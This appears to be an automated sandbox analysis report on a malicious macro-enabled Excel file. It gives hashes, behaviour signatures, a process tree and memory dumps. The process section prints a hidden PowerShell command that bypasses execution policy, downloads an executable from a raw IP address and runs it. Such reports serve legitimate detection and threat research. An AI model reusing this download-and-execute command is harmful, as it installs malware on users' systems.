Analysis

  • max time kernel
    144s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30-05-2024 10:37

General

  • Target

    Copy0761000025.xlsm

  • Size

    430KB

  • MD5

    7d4ea49144ee2f6e90627e4126dd7906

  • SHA1

    435f8134462eeec813c747bf9b8cc7287d3ce05a

  • SHA256

    dd6cd10d521f6b189b3a56ce5a7fb41d16c1bca171c00e79999690822b7bfe25

  • SHA512

    c88469f3bc48600baf802af246aaf66f4c5d1f00baf619b92ad2e1df7a973b98a396e4f20ccbcec43628122c080ee28a921b61e84fe257efdec7e85ecce4e93d

  • SSDEEP

    12288:7fEXQu7SHOCZhSTIS2dGpeWpqivD1YxR25O8UE:7VwarmMSAGMID1R5OtE

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Copy0761000025.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "http://185.205.187.173/xd/Copy0761000025pdf.exe" -OutFile $TempFile; Start-Process $TempFile;
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2152

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2656-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2656-1-0x000000007255D000-0x0000000072568000-memory.dmp

    Filesize

    44KB

  • memory/2656-7-0x0000000007120000-0x0000000007220000-memory.dmp

    Filesize

    1024KB

  • memory/2656-10-0x000000007255D000-0x0000000072568000-memory.dmp

    Filesize

    44KB

  • memory/2656-11-0x0000000007120000-0x0000000007220000-memory.dmp

    Filesize

    1024KB